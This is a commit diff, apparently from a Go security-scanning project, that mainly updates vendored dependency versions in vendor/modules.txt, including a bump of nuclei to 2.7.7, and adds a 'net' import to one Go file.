7	7		import (
	8	+	"net"
8	9		"syscall"
9	10		"unsafe"
10	11		)
		skipped 56 lines

■ ■ ■ ■ ■ ■

vendor/modules.txt

		skipped 77 lines
78	78		# github.com/andybalholm/cascadia v1.3.1
79	79		## explicit; go 1.16
80	80		github.com/andybalholm/cascadia
81		-	# github.com/andygrunwald/go-jira v1.15.1
	81	+	# github.com/andygrunwald/go-jira v1.16.0
82	82		## explicit; go 1.15
83	83		github.com/andygrunwald/go-jira
84	84		# github.com/antchfx/htmlquery v1.2.5
85	85		## explicit; go 1.14
86	86		github.com/antchfx/htmlquery
87		-	# github.com/antchfx/xmlquery v1.3.11
	87	+	# github.com/antchfx/xmlquery v1.3.12
88	88		## explicit; go 1.14
89	89		github.com/antchfx/xmlquery
90	90		# github.com/antchfx/xpath v1.2.1
		skipped 12 lines
103	103		# github.com/asaskevich/govalidator v0.0.0-20210307081110-f21760c49a8d
104	104		## explicit; go 1.13
105	105		github.com/asaskevich/govalidator
106		-	# github.com/aws/aws-sdk-go v1.44.77
	106	+	# github.com/aws/aws-sdk-go v1.44.83
107	107		## explicit; go 1.11
108	108		github.com/aws/aws-sdk-go/aws
109	109		github.com/aws/aws-sdk-go/aws/awserr
		skipped 235 lines
345	345		github.com/gogf/gf/internal/command
346	346		github.com/gogf/gf/internal/empty
347	347		github.com/gogf/gf/internal/utils
348		-	# github.com/golang-jwt/jwt/v4 v4.3.0
349		-	## explicit; go 1.15
	348	+	# github.com/golang-jwt/jwt/v4 v4.4.2
	349	+	## explicit; go 1.16
350	350		github.com/golang-jwt/jwt/v4
351	351		# github.com/golang-sql/civil v0.0.0-20190719163853-cb61b32ac6fe
352	352		## explicit
		skipped 436 lines
789	789		# github.com/projectdiscovery/nuclei-updatecheck-api v0.0.0-20220726130814-981d44a34f84
790	790		## explicit; go 1.16
791	791		github.com/projectdiscovery/nuclei-updatecheck-api/client
792		-	# github.com/projectdiscovery/nuclei/v2 v2.7.6
	792	+	# github.com/projectdiscovery/nuclei/v2 v2.7.7
793	793		## explicit; go 1.17
794	794		github.com/projectdiscovery/nuclei/v2/internal/colorizer
795	795		github.com/projectdiscovery/nuclei/v2/pkg/catalog
		skipped 34 lines
830	830		github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/replacer
831	831		github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/tostring
832	832		github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/utils/excludematchers
	833	+	github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/utils/vardump
833	834		github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/variables
834	835		github.com/projectdiscovery/nuclei/v2/pkg/protocols/dns
835	836		github.com/projectdiscovery/nuclei/v2/pkg/protocols/dns/dnsclientpool
		skipped 50 lines
886	887		# github.com/projectdiscovery/sliceutil v0.0.0-20220625085859-c3a4ecb669f4
887	888		## explicit; go 1.16
888	889		github.com/projectdiscovery/sliceutil
889		-	# github.com/projectdiscovery/stringsutil v0.0.0-20220712170325-48c50c332cb4
	890	+	# github.com/projectdiscovery/stringsutil v0.0.0-20220612082425-0037ce9f89f3
890	891		## explicit; go 1.16
891	892		github.com/projectdiscovery/stringsutil
892	893		# github.com/projectdiscovery/subfinder/v2 v2.5.2
		skipped 48 lines
941	942		# github.com/projectdiscovery/urlutil v0.0.0-20210805190935-3d83726391c1
942	943		## explicit; go 1.16
943	944		github.com/projectdiscovery/urlutil
944		-	# github.com/projectdiscovery/wappalyzergo v0.0.55
	945	+	# github.com/projectdiscovery/wappalyzergo v0.0.57
945	946		## explicit; go 1.16
946	947		github.com/projectdiscovery/wappalyzergo
947	948		# github.com/projectdiscovery/yamldoc-go v1.0.3-0.20211126104922-00d2c6bb43b6
		skipped 151 lines
1099	1100		# github.com/weppos/publicsuffix-go v0.20.0
1100	1101		## explicit; go 1.11
1101	1102		github.com/weppos/publicsuffix-go/publicsuffix
1102		-	# github.com/xanzy/go-gitlab v0.72.0
	1103	+	# github.com/xanzy/go-gitlab v0.73.1
1103	1104		## explicit; go 1.18
1104	1105		github.com/xanzy/go-gitlab
1105	1106		# github.com/xdg-go/pbkdf2 v1.0.0
		skipped 129 lines
1235	1236		# golang.org/x/mod v0.6.0-dev.0.20220419223038-86c51ed26bb4
1236	1237		## explicit; go 1.17
1237	1238		golang.org/x/mod/semver
1238		-	# golang.org/x/net v0.0.0-20220812174116-3211cb980234
	1239	+	# golang.org/x/net v0.0.0-20220826154423-83b083e8dc8b
1239	1240		## explicit; go 1.17
1240	1241		golang.org/x/net/bpf
1241	1242		golang.org/x/net/context
		skipped 164 lines

up PoCs, nuclei to 2.7.7 2022-09-02